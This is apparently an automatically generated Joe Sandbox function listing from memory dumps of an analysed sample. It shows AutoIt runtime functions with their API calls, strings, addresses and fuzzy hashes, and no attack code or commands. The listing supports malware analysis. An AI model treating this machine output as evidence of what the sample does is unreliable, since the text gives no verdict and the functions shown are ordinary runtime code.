Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 2c41204bab0c76c368092b655cd9223b2544a90431ba221825169f12c33c8459
Instruction ID: 16ed3241b1f02f6109fe143d14a9fe1501b76402989d1be31402a3a3b5193359
Opcode Fuzzy Hash: 2c41204bab0c76c368092b655cd9223b2544a90431ba221825169f12c33c8459
Instruction Fuzzy Hash: FF61B370628701AFD311DF64D889FAAB7E4EF49710F10081DF9859B291D770EE98CB92

Function 00278B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

Part of subcall function 001F912D: GetCursorPos.USER32(?), ref: 001F9141
Part of subcall function 001F912D: ScreenToClient.USER32(00000000,?), ref: 001F915E
Part of subcall function 001F912D: GetAsyncKeyState.USER32(00000001), ref: 001F9183
Part of subcall function 001F912D: GetAsyncKeyState.USER32(00000002), ref: 001F919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00278B6B
ImageList_EndDrag.COMCTL32 ref: 00278B71
ReleaseCapture.USER32 ref: 00278B77
SetWindowTextW.USER32(?,00000000), ref: 00278C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00278C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00278CFF

Strings

@GUI_DRAGFILE, xrefs: 00278C9A
p#+, xrefs: 00278C71
@GUI_DROPID, xrefs: 00278C51

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#+
API String ID: 1924731296-3493582189
Opcode ID: ff0d767714ed099bc74284c42e8b82b644023cd7a1f002163b990f402960b7af
Instruction ID: 8c7ebb2b2d6bb1452adb733e481a6f1d39da4afb39041dcecc2af333b41d947a
Opcode Fuzzy Hash: ff0d767714ed099bc74284c42e8b82b644023cd7a1f002163b990f402960b7af
Instruction Fuzzy Hash: 27519C71104344AFD704EF24DC9AFAE77E4FB88714F50062DF99A972A1CB709964CBA2

Function 00253388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002533CF

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002533F0

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00253504
Error: , xrefs: 002534D1
"%s" (%d) : ==> %s:, xrefs: 00253522
Line %d (File "%s"):, xrefs: 00253443, 0025345C
Incorrect parameters to object property !, xrefs: 002534AB
^ ERROR , xrefs: 0025349E

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 70a06677de0c6d99f26213e153f8a1e53c76ecda036c19ea329330c6b704efa6
Instruction ID: 9e6e3a6c15ace70b6790f6c2b65f64d9f68bc1d78fcd21206573378f62708761
Opcode Fuzzy Hash: 70a06677de0c6d99f26213e153f8a1e53c76ecda036c19ea329330c6b704efa6
Instruction Fuzzy Hash: 7051C231910649ABDF19EBE1DD46EEEB7B8AF25340F644165F40572062EB312FA8CF60

Function 0024B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0024B5FC
_wcslen.LIBCMT ref: 0024B608
_wcslen.LIBCMT ref: 0024B64D
_wcslen.LIBCMT ref: 0024B68C
_wcslen.LIBCMT ref: 0024B6C7

Strings

EXISTS, xrefs: 0024B686, 0024B68B
KEYS, xrefs: 0024B647, 0024B64C
REMOVE, xrefs: 0024B602, 0024B607
APPEND, xrefs: 0024B6C1, 0024B6C6

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 1b3e652089e1b82b28a2b653a55b16d5b9ddc1c6291df7a777213217507e0c7c
Instruction ID: 84f8a7fdbfc2e22c5c6501e5d36834a15dd14d089df402fda04b14483277b9f6
Opcode Fuzzy Hash: 1b3e652089e1b82b28a2b653a55b16d5b9ddc1c6291df7a777213217507e0c7c
Instruction Fuzzy Hash: A3412B32A201279BCB156F7DCC905BEB7A9EFA1754B264129E821DB284E731CDA1C790

Function 00255393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002553A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00255416
GetLastError.KERNEL32 ref: 00255420
SetErrorMode.KERNEL32(00000000,READY), ref: 002554A7

Strings

READY, xrefs: 00255460, 00255468
UNKNOWN, xrefs: 00255444
NOTREADY, xrefs: 0025544B
INVALID, xrefs: 00255459
READONLY, xrefs: 00255452

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 42c47edf6cc3d41b7f54688337962c2f3b3c9cd3607c63905453dfa8dfab6cbd
Instruction ID: 4387dfa62d412d7753c492ff4b8f239fcfa50ffa211d2186eee5a52535efebc8
Opcode Fuzzy Hash: 42c47edf6cc3d41b7f54688337962c2f3b3c9cd3607c63905453dfa8dfab6cbd
Instruction Fuzzy Hash: 4531F235A106159FD710DF68C498EAEBBF4FF05306F188069E805CB292DB70ED9ACB90

Function 00273C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00273C79
SetMenu.USER32(?,00000000), ref: 00273C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00273D10
IsMenu.USER32(?), ref: 00273D24
CreatePopupMenu.USER32 ref: 00273D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00273D5B
DrawMenuBar.USER32 ref: 00273D63

Strings

F, xrefs: 00273D4E
0, xrefs: 00273C54

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: b5693ade1d5e881bf54cc889c8add979ca69b6caf2c667e290309053f8ab471b
Instruction ID: 04e69e1b2fe74d11ca1fe5ab3f4f02ac20ac30522aee74d99f4ac1277ad1f1df
Opcode Fuzzy Hash: b5693ade1d5e881bf54cc889c8add979ca69b6caf2c667e290309053f8ab471b
Instruction Fuzzy Hash: C0419E74A1120AEFDB24CF64E848ADA77B5FF49300F14402DF94AA7360D771AA20DF90

Function 00273A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00273A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00273AA0
GetWindowLongW.USER32(?,000000F0), ref: 00273AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00273AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00273B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00273BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00273BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00273BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00273BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00273C13

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 919503dc5734a1c2fe732a2be9636a09994b286a6dfcaddbeaefb51e73e94a7c
Instruction ID: 87e5524caf5a9ddef75967e8ff421de8b5cf7724667f54e48696101219d686de
Opcode Fuzzy Hash: 919503dc5734a1c2fe732a2be9636a09994b286a6dfcaddbeaefb51e73e94a7c
Instruction Fuzzy Hash: 3B618B75910248AFDB11DFA8CC85EEE77B8EB09704F10419AFA19E72A1C770AE61DF50

Function 00212C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00212C94

Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,00000000,00000000,00000000,00000000,?,0021D7F8,00000000,00000007,00000000,?,0021DBF5,00000000), ref: 002129DE
Part of subcall function 002129C8: GetLastError.KERNEL32(00000000,?,0021D7D1,00000000,00000000,00000000,00000000,?,0021D7F8,00000000,00000007,00000000,?,0021DBF5,00000000,00000000), ref: 002129F0

_free.LIBCMT ref: 00212CA0
_free.LIBCMT ref: 00212CAB
_free.LIBCMT ref: 00212CB6
_free.LIBCMT ref: 00212CC1
_free.LIBCMT ref: 00212CCC
_free.LIBCMT ref: 00212CD7
_free.LIBCMT ref: 00212CE2
_free.LIBCMT ref: 00212CED
_free.LIBCMT ref: 00212CFB

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1f3a7c3a312f9b48a339e20ad5fe62e2b7ab19a37bf653b2c23c040604eef8f4
Instruction ID: a9b284510db150c21b103f38257ef737fd9d19caf18c4ce0d3c2de7e64003aa3
Opcode Fuzzy Hash: 1f3a7c3a312f9b48a339e20ad5fe62e2b7ab19a37bf653b2c23c040604eef8f4
Instruction Fuzzy Hash: 6B119676120108EFCB02EF58D842DDD3BA5FF15360F5154A5FA485F222D631EAB49F90

Function 001E1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001E1459
OleUninitialize.OLE32(?,00000000), ref: 001E14F8
UnregisterHotKey.USER32(?), ref: 001E16DD
DestroyWindow.USER32(?), ref: 002224B9
FreeLibrary.KERNEL32(?), ref: 0022251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0022254B

Strings

close all, xrefs: 001E1454

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 889b58e7e4d5d605242ea1a73994612837501e44b8cbdc80b88437a8cb45b180
Instruction ID: 181f6d3e95246d14e7bd016461c79d6583668ac9cb8e6a5e4431250c1d562ed9
Opcode Fuzzy Hash: 889b58e7e4d5d605242ea1a73994612837501e44b8cbdc80b88437a8cb45b180
Instruction Fuzzy Hash: 52D1DF31711662EFCB28EF55D498B2DF7A4BF05700F61819DE90A6B252CB31AD26CF50

Function 001E5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 001E5C7A

Part of subcall function 001E5D0A: GetClientRect.USER32(?,?), ref: 001E5D30
Part of subcall function 001E5D0A: GetWindowRect.USER32(?,?), ref: 001E5D71
Part of subcall function 001E5D0A: ScreenToClient.USER32(?,?), ref: 001E5D99

GetDC.USER32 ref: 002246F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00224708
SelectObject.GDI32(00000000,00000000), ref: 00224716
SelectObject.GDI32(00000000,00000000), ref: 0022472B
ReleaseDC.USER32(?,00000000), ref: 00224733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002247C4

Strings

U, xrefs: 00224693

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 2e97f8e11cd7baa5e1808144bba4f74c34d92c7394ab1ce786f83a8a256eb3ae
Instruction ID: 8d0bfd40736927108e5d2edb3a659d51d051ced7c38d1486b3f8c750cfdd6c7c
Opcode Fuzzy Hash: 2e97f8e11cd7baa5e1808144bba4f74c34d92c7394ab1ce786f83a8a256eb3ae
Instruction Fuzzy Hash: 21711530410606EFCF259FA4E984AFA7BBAFF4A314F244269ED655A166C3319CA1CF50

Function 0025359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002535E4

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

LoadStringW.USER32(002B2390,?,00000FFF,?), ref: 0025360A

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00253724
Error: , xrefs: 002536EF
"%s" (%d) : ==> %s:, xrefs: 00253742
^ ERROR, xrefs: 002536C9
Line %d (File "%s"):, xrefs: 0025366B

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 4a1980aa4b774f3f4e7d1e130bb4af6f0ff98df6ed8f61d5c4f2c279adb2809e
Instruction ID: 178ebfbd64bbe893dd3754c20d8b13fd451a79001d46bea0859feb93dc1d7556
Opcode Fuzzy Hash: 4a1980aa4b774f3f4e7d1e130bb4af6f0ff98df6ed8f61d5c4f2c279adb2809e
Instruction Fuzzy Hash: B0519071C1064ABBCF15EBA1DC46EEEBB78EF24341F544125F505720A2EB301AA9DF64

Function 0025C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0025C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0025C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0025C2CA
GetLastError.KERNEL32 ref: 0025C322
SetEvent.KERNEL32(?), ref: 0025C336
InternetCloseHandle.WININET(00000000), ref: 0025C341

Strings

, xrefs: 0025C2BB

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 16125e13a1d83247313befead0660b9ac60cdfcc038d0c75cb6e83bd773ef3b4
Instruction ID: d8c608e750e2934d2c41f837e2bed63f00731ff5d87d4e1d0a6439b8471f3779
Opcode Fuzzy Hash: 16125e13a1d83247313befead0660b9ac60cdfcc038d0c75cb6e83bd773ef3b4
Instruction Fuzzy Hash: B0319171520308BFD7219F64DC88A6B7BFCEB49741F20855EF846D2201EB70DD588B64

Function 0024989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00223AAF,?,?,Bad directive syntax error,0027CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 002498BC
LoadStringW.USER32(00000000,?,00223AAF,?), ref: 002498C3

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00249987

Strings

Error: , xrefs: 00249955
%s (%d) : ==> %s.: %s %s, xrefs: 002498F1
Line %d:, xrefs: 00249912
Line %d (File "%s"):, xrefs: 0024992D
., xrefs: 0024996D

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 34351ff9ac0195dce3f1075b61a8511449a92d450f2fa27d5a1e9b9179ff1239
Instruction ID: be05a081cd8dfbcf5ca35c15b58198cdc890c35e00ea16136918f9fee6668054
Opcode Fuzzy Hash: 34351ff9ac0195dce3f1075b61a8511449a92d450f2fa27d5a1e9b9179ff1239
Instruction Fuzzy Hash: FD217431C1025EBBCF15AF90DC0AEEE7775FF29700F044459F515660A1EB719A68DB50

Function 0024209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 002420AB
GetClassNameW.USER32(00000000,?,00000100), ref: 002420C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0024214D

Strings

list, xrefs: 0024212F
SHELLDLL_DefView, xrefs: 002420CC
details, xrefs: 002420FB
smallicons, xrefs: 00242115
largeicons, xrefs: 002420E1

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: c4b899c5a416d09a8b401efb04a5449947c23a8a26b454395dc34d44e06bfe2d
Instruction ID: 44a0f58a795f4544605284f1188fb7fe9dc03402c7f3ae1e7bf02cfd42ad99eb
Opcode Fuzzy Hash: c4b899c5a416d09a8b401efb04a5449947c23a8a26b454395dc34d44e06bfe2d
Instruction Fuzzy Hash: BF1127762B8317FAF7093625AC0BDA7339CCB06325B70001AFB0CA40D3EEA558755A24

Function 0021CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0021CEB7
_free.LIBCMT ref: 0021CF22
_free.LIBCMT ref: 0021CF48
_free.LIBCMT ref: 0021CF71
_free.LIBCMT ref: 0021CFA9
_free.LIBCMT ref: 0021CFDA
_free.LIBCMT ref: 0021D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0021D09C
_free.LIBCMT ref: 0021D0B5

Memory Dump Source

Source File: 00000000.00000002.2344802484.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.2344786118.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344872445.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344926408.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2344949229.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_smQoKNkwB7.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 86c3a0f5443440df310f30df7a8d5f4f05379c8e27a444da52e06e8ae3d50c87
Instruction ID: a580376edef49e3db45ac5a0dd72e60b94f44b2abadedd6c9039ac98f0d9c8b9
Opcode Fuzzy Hash: 86c3a0f5443440df310f30df7a8d5f4f05379c8e27a444da52e06e8ae3d50c87
Instruction Fuzzy Hash: 7661AD75964306EFDB21AFB49885AEA7BD5EF25320F24016EF80497281D7319CF2CB90

Function 002750D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00275186
ShowWindow.USER32(?,00000000), ref: 002751C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 002751CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 002751D1

Part of subcall function 00276FBA: DeleteObject.GDI32(00000000), ref: 00276FE6

GetWindowLongW.USER32(?,000000F0), ref: 0027520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0027521A
